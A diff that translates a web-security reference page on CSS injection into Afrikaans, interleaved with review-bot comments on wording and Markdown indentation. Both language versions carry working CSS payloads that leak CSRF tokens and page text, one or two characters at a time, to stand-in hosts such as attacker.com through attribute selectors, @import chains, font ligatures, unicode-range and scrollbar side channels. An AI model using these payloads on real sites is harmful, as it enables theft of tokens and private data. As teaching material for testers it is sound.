-## CSS Injection +## CSS Injeksie -### Attribute Selector - -CSS selectors are crafted to match values of an `input` element's `name` and `value` attributes. If the input element's value attribute starts with a specific character, a predefined external resource is loaded: +### Atribuutselekteerder +CSS-selekteerders is ontwerp om waardes van 'n `input`-element se `name`- en `value`-eienskappe te pas. As die waarde-eienskap van die invoerelement begin met 'n spesifieke karakter, word 'n voorafbepaalde eksterne bron gelaai: ```css input[name=csrf][value^=a]{ - background-image: url(https://attacker.com/exfil/a); +background-image: url(https://attacker.com/exfil/a); } input[name=csrf][value^=b]{ - background-image: url(https://attacker.com/exfil/b); +background-image: url(https://attacker.com/exfil/b); } /* ... */ input[name=csrf][value^=9]{ - background-image: url(https://attacker.com/exfil/9); +background-image: url(https://attacker.com/exfil/9); } ``` +Hierdie benadering het egter 'n beperking wanneer dit kom by verborge invoerelemente (`type="hidden"`) omdat verborge elemente nie agtergronde laai nie. -However, this approach faces a limitation when dealing with hidden input elements (`type="hidden"`) because hidden elements do not load backgrounds. - -#### Bypass for Hidden Elements - -To circumvent this limitation, you can target a subsequent sibling element using the `~` general sibling combinator. The CSS rule then applies to all siblings following the hidden input element, causing the background image to load: +#### Oorweging vir Verborge Elemente +Om hierdie beperking te omseil, kan jy 'n volgende broer-element teiken deur die `~` algemene broer-kombineerder te gebruik. 
Die CSS-reël is dan van toepassing op alle broers wat volg op die verborge invoerelement, wat veroorsaak dat die agtergrondbeeld laai: ```css input[name=csrf][value^=csrF] ~ * { - background-image: url(https://attacker.com/exfil/csrF); +background-image: url(https://attacker.com/exfil/csrF); } ``` +'n Praktiese voorbeeld van die uitbuiting van hierdie tegniek word in die voorsiene kodefragment beskryf. Jy kan dit [hier](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e) besigtig. -A practical example of exploiting this technique is detailed in the provided code snippet. You can view it [here](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e). +#### Voorvereistes vir CSS-injeksie -#### Prerequisites for CSS Injection +Om die CSS-injeksietegniek effektief te benut, moet sekere voorwaardes voldoen word: -For the CSS Injection technique to be effective, certain conditions must be met: +1. **Payload-lengte**: Die CSS-injeksievektor moet voldoende lang payloads ondersteun om die gekonstrueerde selekteerders te akkommodeer. +2. **CSS-herwaardering**: Jy moet die vermoë hê om die bladsy te raamwerk, wat nodig is om die herwaardering van CSS met nuut gegenereerde payloads te trigger. +3. **Eksterne Hulpbronne**: Die tegniek neem aan dat die gebruik van eksterne gehuisvese beelde moontlik is. Dit kan beperk word deur die webwerf se inhoudsbeveiligingsbeleid (CSP). -1. **Payload Length**: The CSS injection vector must support sufficiently long payloads to accommodate the crafted selectors. -2. **CSS Re-evaluation**: You should have the ability to frame the page, which is necessary to trigger the re-evaluation of CSS with newly generated payloads. -3. **External Resources**: The technique assumes the ability to use externally hosted images. This might be restricted by the site's Content Security Policy (CSP). 
- -### Blind Attribute Selector - -As [**explained in this post**](https://portswigger.net/research/blind-css-exfiltration), it's possible to combine the selectors **`:has`** and **`:not`** to identify content even from blind elements. This is very useful when you have no idea what is inside the web page loading the CSS injection.\ -It's also possible to use those selectors to extract information from several block of the same type like in: +### Blinde Eienskapsselekteerder +Soos [**verduidelik in hierdie pos**](https://portswigger.net/research/blind-css-exfiltration), is dit moontlik om die selekteerders **`:has`** en **`:not`** te kombineer om inhoud selfs van blinde elemente te identifiseer. Dit is baie nuttig wanneer jy geen idee het wat binne die webbladsy wat die CSS-injeksie laai, is nie.\ +Dit is ook moontlik om hierdie selekteerders te gebruik om inligting uit verskeie blokke van dieselfde tipe te onttrek, soos in: ```html ``` - -Combining this with the following **@import** technique, it's possible to exfiltrate a lot of **info using CSS injection from blind pages with** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.** +Deur dit te kombineer met die volgende **@import** tegniek, is dit moontlik om baie **inligting te eksfiltreer deur middel van CSS-injeksie vanaf blinde bladsye met** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.** ### @import -The previous technique has some drawbacks, check the prerequisites. You either need to be able to **send multiple links to the victim**, or you need to be able to **iframe the CSS injection vulnerable page**. +Die vorige tegniek het 'n paar nadele, kyk na die vereistes. Jy moet óf in staat wees om **verskeie skakels na die slagoffer te stuur**, óf jy moet in staat wees om **die CSS-injeksie vatbare bladsy in 'n ifram te plaas**. 
-However, there is another clever technique that uses **CSS `@import`** to improve the quality of the technique. +Daar is egter 'n ander slim tegniek wat gebruik maak van **CSS `@import`** om die kwaliteit van die tegniek te verbeter. -This was first showed by [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) and it works like this: - -Instead of loading the same page once and again with tens of different payloads each time (like in the previous one), we are going to **load the page just once and just with an import to the attackers server** (this is the payload to send to the victim): +Dit is vir die eerste keer gewys deur [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) en dit werk so: +In plaas daarvan om die bladsy telkens weer te laai met tientalle verskillende lading elke keer (soos in die vorige een), gaan ons die bladsy net een keer laai en net met 'n invoer na die aanvaller se bediener (dit is die lading wat na die slagoffer gestuur moet word): ```css @import url('//attacker.com:5001/start?'); ``` +1. Die invoer gaan **CSS-skrips** van die aanvallers ontvang en die **blaaier sal dit laai**. +2. Die eerste deel van die CSS-skrips wat die aanvaller sal stuur, is **nog 'n `@import` na die aanvallers se bediener**. +1. Die aanvallers se bediener sal nog nie hierdie versoek beantwoord nie, omdat ons 'n paar karakters wil lek en dan hierdie invoer beantwoord met die payload om die volgende karakters te lek. +3. Die tweede en groter deel van die payload gaan 'n **attribuutselekteerder-lekkasie-payload** wees. +1. Dit sal die aanvallers se bediener die **eerste karakter van die geheim en die laaste een** stuur. +4. Sodra die aanvallers se bediener die **eerste en laaste karakter van die geheim ontvang het**, sal dit die invoer wat in stap 2 versoek is, **beantwoord**. +1. 
Die antwoord gaan presies dieselfde wees as die **stappe 2, 3 en 4**, maar hierdie keer sal dit probeer om die tweede karakter van die geheim te **vind en dan die voorlaaste**. -1. The import is going to **receive some CSS script** from the attackers and the **browser will load it**. -2. The first part of the CSS script the attacker will send is **another `@import` to the attackers server again.** - 1. The attackers server won't respond this request yet, as we want to leak some chars and then respond this import with the payload to leak the next ones. -3. The second and bigger part of the payload is going to be an **attribute selector leakage payload** - 1. This will send to the attackers server the **first char of the secret and the last one** -4. Once the attackers server has received the **first and last char of the secret**, it will **respond the import requested in the step 2**. - 1. The response is going to be exactly the same as the **steps 2, 3 and 4**, but this time it will try to **find the second char of the secret and then penultimate**. +Die aanvaller sal **hierdie lus volg totdat dit die geheim heeltemal lek**. -The attacker will f**ollow that loop until it manages to leak completely the secret**. 
- -You can find the original [**Pepe Vila's code to exploit this here**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) or you can find almost the [**same code but commented here**.](./#css-injection) +Jy kan die oorspronklike [**Pepe Vila se kode om hiervan gebruik te maak hier vind**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) of jy kan byna dieselfde [**kode maar met kommentaar hier vind**](./#css-injection) {% hint style="info" %} -The script will try to discover 2 chars each time (from the beginning and from the end) because the attribute selector allows to do things like: - +Die skrips sal elke keer probeer om 2 karakters te ontdek (van die begin en van die einde) omdat die attribuutselekteerder dit moontlik maak om dinge soos: ```css /* value^= to match the beggining of the value*/ input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)} 
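Review bot: `#### Bypass for Hidden Elements` comes out as `#### Oorweging vir Verborge Elemente` ("consideration for hidden elements"), which drops the point of the subsection; `#### Omseiling vir Verborge Elemente` matches the body text, which already says "Om hierdie beperking te omseil". In the same hunk, the nested sub-steps of the `@import` loop (the indented `1.` items under steps 2, 3 and 4 in the removed English lines) are emitted at column 0 as `+1. Die aanvallers se bediener sal nog nie hierdie versoek beantwoord nie`, so Markdown renders them as restarted top-level lists and the "server does not answer yet" clarification no longer hangs off step 2; keep the three-space indentation from the English. The prose also alternates between "payload" (`Payload-lengte`, `attribuutselekteerder-lekkasie-payload`) and "lading" (`tientalle verskillende lading`, `dit is die lading wat na die slagoffer gestuur moet word`) for the same term; pick one. Typos: `in 'n ifram te plaas` should be `iframe`, and `die bladsy te raamwerk` under prerequisite 2 reads better as `die bladsy in 'n iframe te laai`. Finally, the CSS blocks lose their leading indentation (`- background-image:` vs `+background-image:`), which is not a translation change and only adds diff noise; leaving the code bytes untouched keeps the hunk reviewable.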
@@ -108,48 +99,46 @@ input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)} /* value$= to match the ending of the value*/ input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)} ``` - -This allows the script to leak the secret faster. +Dit stel die skrip in staat om die geheim vinniger te lek. {% endhint %} {% hint style="warning" %} -Sometimes the script **doesn't detect correctly that the prefix + suffix discovered is already the complete flag** and it will continue forwards (in the prefix) and backwards (in the suffix) and at some point it will hang.\ -No worries, just check the **output** because **you can see the flag there**. +Soms **detecteer die skrip nie korrek dat die ontdekte voorvoegsel + agtervoegsel reeds die volledige vlag is nie** en dit sal voortgaan (in die voorvoegsel) en agteruit (in die agtervoegsel) en op 'n punt sal dit hang.\ +Moenie bekommerd wees nie, kyk net na die **uitset** omdat **jy die vlag daar kan sien**. {% endhint %} -### Other selectors +### Ander selekteerders -Other ways to access DOM parts with **CSS selectors**: +Ander maniere om DOM-dele met **CSS-selekteerders** te benader: -* **`.class-to-search:nth-child(2)`**: This will search the second item with class "class-to-search" in the DOM. -* **`:empty`** selector: Used for example in [**this writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:** +* **`.klas-om-te-soek:nth-child(2)`**: Dit sal die tweede item met die klas "klas-om-te-soek" in die DOM soek. 
+* **`:empty`** selekteerder: Gebruik byvoorbeeld in [**hierdie writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:** - ```css - [role^="img"][aria-label="1"]:empty { background-image: url("YOUR_SERVER_URL?1"); } - ``` +```css +[role^="img"][aria-label="1"]:empty { background-image: url("JOU_BEDIENER_URL?1"); } +``` -### Error based XS-Search +### Fout-gebaseerde XS-Soek -**Reference:** [CSS based Attack: Abusing unicode-range of @font-face ](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [Error-Based XS-Search PoC by @terjanq](https://twitter.com/terjanq/status/1180477124861407234) - -The overall intention is to **use a custom font from a controlled endpoint** and ensure that **text (in this case, 'A') is displayed with this font only if the specified resource (`favicon.ico`) cannot be loaded**. +**Verwysing:** [Aanval gebaseer op CSS: Misbruik van unicode-reeks van @font-face ](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [Fout-gebaseerde XS-Soek PoC deur @terjanq](https://twitter.com/terjanq/status/1180477124861407234) +Die algemene bedoeling is om **'n aangepaste lettertipe vanaf 'n beheerde eindpunt te gebruik** en te verseker dat **teks (in hierdie geval, 'A') slegs met hierdie lettertipe vertoon word as die gespesifiseerde bron (`favicon.ico`) nie gelaai kan word nie**. ```html - + @@ -157,123 +146,116 @@ The overall intention is to **use a custom font from a controlled endpoint** and ``` +1. **Aangepaste Lettertype Gebruik**: +- 'n Aangepaste lettertype word gedefinieer deur die `@font-face` reël binne 'n `

AB

htm ``` +Wanneer jy hierdie bladsy besoek, haal Chrome en Firefox "?A" en "?B" op omdat die teksnode van sensitiewe inligting "A" en "B" karakters bevat. Maar Chrome en Firefox haal nie "?C" op nie omdat dit nie "C" bevat nie. Dit beteken dat ons in staat was om "A" en "B" te lees. -When you access this page, Chrome and Firefox fetch "?A" and "?B" because text node of sensitive-information contains "A" and "B" characters. But Chrome and Firefox do not fetch "?C" because it does not contain "C". This means that we have been able to read "A" and "B". +### Uitlek van teksnode (I): ligature -### Text node exfiltration (I): ligatures +**Verwysing:** [Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/) -**Reference:** [Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/) +Die tegniek wat beskryf word, behels die onttrekking van teks uit 'n node deur gebruik te maak van letterligature en die monitering van veranderinge in breedte. Die proses behels verskeie stappe: -The technique described involves extracting text from a node by exploiting font ligatures and monitoring changes in width. The process involves several steps: +1. **Skepping van aangepaste lettertipes**: +- SVG-lettertipes word vervaardig met gliefies wat 'n `horiz-adv-x` eienskap het, wat 'n groot breedte vir 'n glief verteenwoordig wat 'n twee-karakter volgorde voorstel. +- Voorbeeld SVG-glief: ``, waar "XY" 'n twee-karakter volgorde aandui. +- Hierdie lettertipes word dan omskakel na woff-formaat deur gebruik te maak van fontforge. -1. **Creation of Custom Fonts**: - - SVG fonts are crafted with glyphs having a `horiz-adv-x` attribute, which sets a large width for a glyph representing a two-character sequence. 
- - Example SVG glyph: ``, where "XY" denotes a two-character sequence. - - These fonts are then converted to woff format using fontforge. +2. **Opsporing van Breedteveranderinge**: +- CSS word gebruik om te verseker dat teks nie omslaan nie (`white-space: nowrap`) en om die skuifbalk-styl aan te pas. +- Die verskyning van 'n horisontale skuifbalk, wat duidelik gestyl is, dien as 'n aanduiding (orakel) dat 'n spesifieke ligatuur, en dus 'n spesifieke karaktervolgorde, teenwoordig is in die teks. +- Die betrokke CSS: +```css +body { white-space: nowrap }; +body::-webkit-scrollbar { background: blue; } +body::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); } +``` -2. **Detection of Width Changes**: - - CSS is used to ensure that text does not wrap (`white-space: nowrap`) and to customize the scrollbar style. - - The appearance of a horizontal scrollbar, styled distinctly, acts as an indicator (oracle) that a specific ligature, and hence a specific character sequence, is present in the text. - - The CSS involved: - ```css - body { white-space: nowrap }; - body::-webkit-scrollbar { background: blue; } - body::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); } - ``` +3. **Uitbuitingsproses**: +- **Stap 1**: Lettertipes word geskep vir paartjies karakters met aansienlike breedte. +- **Stap 2**: 'n Skuifbalk-gebaseerde truuk word gebruik om op te spoor wanneer die glief met groot breedte (ligatuur vir 'n karakterpaar) weergegee word, wat die teenwoordigheid van die karaktervolgorde aandui. +- **Stap 3**: Met die opsporing van 'n ligatuur word nuwe gliefies gegenereer wat drie-karakter volgordes voorstel, waarin die opgespoorde paar ingesluit word en 'n voorafgaande of volgende karakter bygevoeg word. +- **Stap 4**: Die opsporing van die drie-karakter ligatuur word uitgevoer. +- **Stap 5**: Die proses herhaal, waardeur die volledige teks geleidelik onthul word. -3. 
**Exploit Process**: - - **Step 1**: Fonts are created for pairs of characters with substantial width. - - **Step 2**: A scrollbar-based trick is employed to detect when the large width glyph (ligature for a character pair) is rendered, indicating the presence of the character sequence. - - **Step 3**: Upon detecting a ligature, new glyphs representing three-character sequences are generated, incorporating the detected pair and adding a preceding or succeeding character. - - **Step 4**: Detection of the three-character ligature is carried out. - - **Step 5**: The process repeats, progressively revealing the entire text. +4. **Optimering**: +- Die huidige inisialisasiemetode met behulp van ` -### Text node exfiltration (II): leaking the charset with a default font (not requiring external assets) +**Verwysing:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html) -**Reference:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html) +Hierdie truuk is vrygestel in hierdie [**Slackers-thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with\_single\_css\_injection/). Die karakterstel wat in 'n teksnode gebruik word, kan **met die versteklettertipes** wat in die blaaier geïnstalleer is, uitgelek word: geen eksterne - of aangepaste - lettertipes is nodig nie. -This trick was released in this [**Slackers thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with\_single\_css\_injection/). The charset used in a text node can be leaked **using the default fonts** installed in the browser: no external -or custom- fonts are needed. +Die konsep draai om die gebruik van 'n animasie om 'n `div` se breedte geleidelik te vergroot, sodat een karakter op 'n slag van die 'suffix'-gedeelte van die teks na die 'prefix'-gedeelte kan oorgaan. 
Hierdie proses verdeel die teks effektief in twee afdelings: -The concept revolves around utilizing an animation to incrementally expand a `div`'s width, allowing one character at a time to transition from the 'suffix' part of the text to the 'prefix' part. This process effectively splits the text into two sections: +1. **Prefix**: Die aanvanklike lyn. +2. **Suffix**: Die daaropvolgende lyn(s). -1. **Prefix**: The initial line. -2. **Suffix**: The subsequent line(s). - -The transition stages of the characters would appear as follows: +Die oorgangsfases van die karakters sal as volg lyk: **C**\ ADB 
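Review bot: in the ligature section the nested list structure is broken: the sub-bullets of each numbered step are emitted at column 0 (`+1. **Skepping van aangepaste lettertipes**:` followed by `+- SVG-lettertipes word vervaardig ...`), so each `1.`/`2.`/`3.` item is followed by a separate dash list and the numbering restarts; the removed English lines indent those sub-bullets and the `Die betrokke CSS` code fence by three spaces, and the translation should keep that. Word choice: `paartjies karakters` in Stap 1 means "little couples" rather than pairs (`pare karakters`), `Optimering` is not the usual form (`Optimalisering`), and `word dan omskakel na woff-formaat` needs the participle `omgeskakel`. The step text itself is otherwise a faithful rendering of the scrollbar-oracle procedure.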
@@ -287,17 +269,16 @@ B **CADB** -During this transition, the **unicode-range trick** is employed to identify each new character as it joins the prefix. This is achieved by switching the font to Comic Sans, which is notably taller than the default font, consequently triggering a vertical scrollbar. This scrollbar's appearance indirectly reveals the presence of a new character in the prefix. +Tydens hierdie oorgang word die **unicode-range truuk** gebruik om elke nuwe karakter te identifiseer wanneer dit by die prefix aansluit. Dit word bereik deur die lettertipe na Comic Sans te skakel, wat merkbaar langer as die versteklettertipe is en dus 'n vertikale skuifbalk veroorsaak. Hierdie skuifbalk se verskyning onthul indirek die teenwoordigheid van 'n nuwe karakter in die prefix. -Although this method allows the detection of unique characters as they appear, it does not specify which character is repeated, only that a repetition has occurred. +Alhoewel hierdie metode die opsporing van unieke karakters soos hulle verskyn, moontlik maak, spesifiseer dit nie watter karakter herhaal word nie, slegs dat 'n herhaling plaasgevind het. {% hint style="info" %} -Basically, the **unicode-range is used to detect a char**, but as we don't want to load an external font, we need to find another way.\ -When the **char** is **found**, it's **given** the pre-installed **Comic Sans font**, which **makes** the char **bigger** and **triggers a scroll bar** which will **leak the found char**. +Basies word die **unicode-range gebruik om 'n karakter op te spoor**, maar omdat ons nie 'n eksterne lettertipe wil laai nie, moet ons 'n ander manier vind.\ +Wanneer die **karakter** gevind word, word dit die vooraf geïnstalleerde **Comic Sans-lettertipe** gegee, wat die karakter **groter** maak en 'n **skuifbalk veroorsaak** wat die gevonde karakter sal **lek**. 
{% endhint %} -Check the code extracted from the PoC: - +Kyk na die kode wat uit die PoC onttrek is: ```css /* comic sans is high (lol) and causes a vertical overflow */ @font-face{font-family:has_A;src:local('Comic Sans MS');unicode-range:U+41;font-style:monospace;} 
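Review bot: `wat merkbaar langer as die versteklettertipe is` says Comic Sans is longer than the default font; the English says taller, and the same sentence goes on to explain that this triggers a `vertikale skuifbalk`, so `hoër` is the word that keeps the cause and effect consistent. Nothing else in this hunk beyond the dropped blank line before the `Kyk na die kode wat uit die PoC onttrek is:` fence, which is harmless.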
@@ -339,142 +320,135 @@ Check the code extracted from the PoC: @font-face{font-family:rest;src: local('Courier New');font-style:monospace;unicode-range:U+0-10FFFF} div.leak { - overflow-y: auto; /* leak channel */ - overflow-x: hidden; /* remove false positives */ - height: 40px; /* comic sans capitals exceed this height */ - font-size: 0px; /* make suffix invisible */ - letter-spacing: 0px; /* separation */ - word-break: break-all; /* small width split words in lines */ - font-family: rest; /* default */ - background: grey; /* default */ - width: 0px; /* initial value */ - animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */ - animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */ +overflow-y: auto; /* leak channel */ +overflow-x: hidden; /* remove false positives */ +height: 40px; /* comic sans capitals exceed this height */ +font-size: 0px; /* make suffix invisible */ +letter-spacing: 0px; /* separation */ +word-break: break-all; /* small width split words in lines */ +font-family: rest; /* default */ +background: grey; /* default */ +width: 0px; /* initial value */ +animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */ +animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */ } div.leak::first-line{ - font-size: 30px; /* prefix is visible in first line */ - text-transform: uppercase; /* only capital letters leak */ +font-size: 30px; /* prefix is visible in first line */ +text-transform: uppercase; /* only capital letters leak */ } /* iterate over all chars */ @keyframes trychar { - 0% { font-family: rest; } /* delay for width change */ - 5% { font-family: has_A, rest; --leak: url(?a); } - 6% { font-family: rest; } - 10% { font-family: has_B, rest; --leak: url(?b); } - 11% { font-family: 
rest; } - 15% { font-family: has_C, rest; --leak: url(?c); } - 16% { font-family: rest } - 20% { font-family: has_D, rest; --leak: url(?d); } - 21% { font-family: rest; } - 25% { font-family: has_E, rest; --leak: url(?e); } - 26% { font-family: rest; } - 30% { font-family: has_F, rest; --leak: url(?f); } - 31% { font-family: rest; } - 35% { font-family: has_G, rest; --leak: url(?g); } - 36% { font-family: rest; } - 40% { font-family: has_H, rest; --leak: url(?h); } - 41% { font-family: rest } - 45% { font-family: has_I, rest; --leak: url(?i); } - 46% { font-family: rest; } - 50% { font-family: has_J, rest; --leak: url(?j); } - 51% { font-family: rest; } - 55% { font-family: has_K, rest; --leak: url(?k); } - 56% { font-family: rest; } - 60% { font-family: has_L, rest; --leak: url(?l); } - 61% { font-family: rest; } - 65% { font-family: has_M, rest; --leak: url(?m); } - 66% { font-family: rest; } - 70% { font-family: has_N, rest; --leak: url(?n); } - 71% { font-family: rest; } - 75% { font-family: has_O, rest; --leak: url(?o); } - 76% { font-family: rest; } - 80% { font-family: has_P, rest; --leak: url(?p); } - 81% { font-family: rest; } - 85% { font-family: has_Q, rest; --leak: url(?q); } - 86% { font-family: rest; } - 90% { font-family: has_R, rest; --leak: url(?r); } - 91% { font-family: rest; } - 95% { font-family: has_S, rest; --leak: url(?s); } - 96% { font-family: rest; } +0% { font-family: rest; } /* delay for width change */ +5% { font-family: has_A, rest; --leak: url(?a); } +6% { font-family: rest; } +10% { font-family: has_B, rest; --leak: url(?b); } +11% { font-family: rest; } +15% { font-family: has_C, rest; --leak: url(?c); } +16% { font-family: rest } +20% { font-family: has_D, rest; --leak: url(?d); } +21% { font-family: rest; } +25% { font-family: has_E, rest; --leak: url(?e); } +26% { font-family: rest; } +30% { font-family: has_F, rest; --leak: url(?f); } +31% { font-family: rest; } +35% { font-family: has_G, rest; --leak: url(?g); } +36% { 
font-family: rest; } +40% { font-family: has_H, rest; --leak: url(?h); } +41% { font-family: rest } +45% { font-family: has_I, rest; --leak: url(?i); } +46% { font-family: rest; } +50% { font-family: has_J, rest; --leak: url(?j); } +51% { font-family: rest; } +55% { font-family: has_K, rest; --leak: url(?k); } +56% { font-family: rest; } +60% { font-family: has_L, rest; --leak: url(?l); } +61% { font-family: rest; } +65% { font-family: has_M, rest; --leak: url(?m); } +66% { font-family: rest; } +70% { font-family: has_N, rest; --leak: url(?n); } +71% { font-family: rest; } +75% { font-family: has_O, rest; --leak: url(?o); } +76% { font-family: rest; } +80% { font-family: has_P, rest; --leak: url(?p); } +81% { font-family: rest; } +85% { font-family: has_Q, rest; --leak: url(?q); } +86% { font-family: rest; } +90% { font-family: has_R, rest; --leak: url(?r); } +91% { font-family: rest; } +95% { font-family: has_S, rest; --leak: url(?s); } +96% { font-family: rest; } } /* increase width char by char, i.e. 
add new char to prefix */ @keyframes loop { - 0% { width: 0px } - 1% { width: 20px } - 2% { width: 40px } - 3% { width: 60px } - 4% { width: 80px } - 4% { width: 100px } - 5% { width: 120px } - 6% { width: 140px } - 7% { width: 0px } +0% { width: 0px } +1% { width: 20px } +2% { width: 40px } +3% { width: 60px } +4% { width: 80px } +4% { width: 100px } +5% { width: 120px } +6% { width: 140px } +7% { width: 0px } } div::-webkit-scrollbar { - background: blue; +background: blue; } /* side-channel */ div::-webkit-scrollbar:vertical { - background: blue var(--leak); +background: blue var(--leak); } ``` +### Teksnodus-uitlek (III): lek van die tekenstel deur die karakterstel te verberg met 'n versteklettertipe (vereis nie eksterne bates nie) -### Text node exfiltration (III): leaking the charset with a default font by hiding elements (not requiring external assets) +**Verwysing:** Dit word genoem as ['n onsuksesvolle oplossing in hierdie verslag](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves) -**Reference:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves) +Hierdie geval is baie soortgelyk aan die vorige een, maar in hierdie geval is die doel om spesifieke karakters groter as ander te maak om iets te verberg, soos 'n knoppie wat nie deur die robot gedruk moet word nie of 'n prent wat nie gelaai sal word nie. So ons kan die aksie (of die gebrek aan aksie) meet en weet of 'n spesifieke karakter in die teks voorkom. -This case is very similar to the previous one, however, in this case the goal of making specific **chars bigger than other is to hide something** like a button to not be pressed by the bot or a image that won't be loaded. So we could measure the action (or lack of the action) and know if a specific char is present inside the text. 
+### Teksnodus-uitlek (III): lek van die tekenstel deur middel van kasstyd (vereis nie eksterne bates nie) -### Text node exfiltration (III): leaking the charset by cache timing (not requiring external assets) - -**Reference:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves) - -In this case, we could try to leak if a char is in the text by loading a fake font from the same origin: +**Verwysing:** Dit word genoem as ['n onsuksesvolle oplossing in hierdie verslag](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves) +In hierdie geval kan ons probeer om uit te lek of 'n karakter in die teks voorkom deur 'n vals lettertipe van dieselfde oorsprong te laai: ```css @font-face { - font-family: "A1"; - src: url(/static/bootstrap.min.css?q=1); - unicode-range: U+0041; +font-family: "A1"; +src: url(/static/bootstrap.min.css?q=1); +unicode-range: U+0041; } ``` +Indien daar 'n ooreenstemming is, sal die **lettertipe gelaai word vanaf `/static/bootstrap.min.css?q=1`**. Alhoewel dit nie suksesvol gelaai sal word nie, moet die **blaaier dit in die skyfgeheue stoor**, en selfs as daar geen skyfgeheue is nie, is daar 'n **304 nie gewysigde** meganisme, sodat die **reaksie vinniger moet wees** as ander dinge. -If there is a match, the **font will be loaded from `/static/bootstrap.min.css?q=1`**. Although it won’t load successfully, the **browser should cache it**, and even if there is no cache, there is a **304 not modified** mechanism, so the **response should be faster** than other things. +Maar as die tydverskil tussen die gekeëerde reaksie en die nie-gekeëerde een nie groot genoeg is nie, sal dit nie nuttig wees nie. Byvoorbeeld, die outeur het genoem: Na toetsing het ek egter bevind dat die eerste probleem is dat die spoed nie veel verskil nie, en die tweede probleem is dat die robot die `disk-cache-size=1` vlag gebruik, wat werklik deurdag is. 
-However, if the time difference of the cached response from the non-cached one isn't big enough, this won't be useful. For example, the author mentioned: However, after testing, I found that the first problem is that the speed is not much different, and the second problem is that the bot uses the `disk-cache-size=1` flag, which is really thoughtful. +### Teksknoop uitlek (III): lek van die karakterstel deur die tyd te meet wanneer honderde plaaslike "lettertipes" gelaai word (sonder eksterne bates) -### Text node exfiltration (III): leaking the charset by timing loading hundreds of local "fonts" (not requiring external assets) - -**Reference:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves) - -In this case you can indicate **CSS to load hundreds of fake fonts** from the same origin when a match occurs. This way you can **measure the time** it takes and find out if a char appears or not with something like: +**Verwysing:** Dit word genoem as ['n onsuksesvolle oplossing in hierdie skryfstuk](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves) +In hierdie geval kan jy **CSS aandui om honderde vals lettertipes** van dieselfde oorsprong te laai wanneer 'n ooreenstemming plaasvind. Op hierdie manier kan jy die **tyd meet** wat dit neem en uitvind of 'n karakter verskyn of nie met iets soos: ```css @font-face { - font-family: "A1"; - src: url(/static/bootstrap.min.css?q=1), - url(/static/bootstrap.min.css?q=2), - .... - url(/static/bootstrap.min.css?q=500); - unicode-range: U+0041; +font-family: "A1"; +src: url(/static/bootstrap.min.css?q=1), +url(/static/bootstrap.min.css?q=2), +.... 
+url(/static/bootstrap.min.css?q=500); +unicode-range: U+0041; } ``` - -And the bot’s code looks like this: - +En die kode van die bot lyk soos volg: ```python browser.get(url) WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete') time.sleep(30) ``` +So, as die lettertipe nie ooreenstem nie, word verwag dat die responstyd wanneer die bot besoek word, ongeveer 30 sekondes sal wees. As daar egter 'n lettertipe-ooreenkoms is, sal verskeie versoek na die lettertipe gestuur word, wat veroorsaak dat die netwerk voortdurende aktiwiteit het. As gevolg hiervan sal dit langer neem om aan die stopvoorwaarde te voldoen en die respons te ontvang. Daarom kan die responstyd gebruik word as 'n aanduiding om vas te stel of daar 'n lettertipe-ooreenkoms is. -So, if the font does not match, the response time when visiting the bot is expected to be approximately 30 seconds. However, if there is a font match, multiple requests will be sent to retrieve the font, causing the network to have continuous activity. As a result, it will take longer to satisfy the stop condition and receive the response. Therefore, the response time can be used as an indicator to determine if there is a font match. - -## References +## Verwysings * [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e) * [https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b](https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b) @@ -483,14 +457,14 @@ So, if the font does not match, the response time when visiting the bot is expec
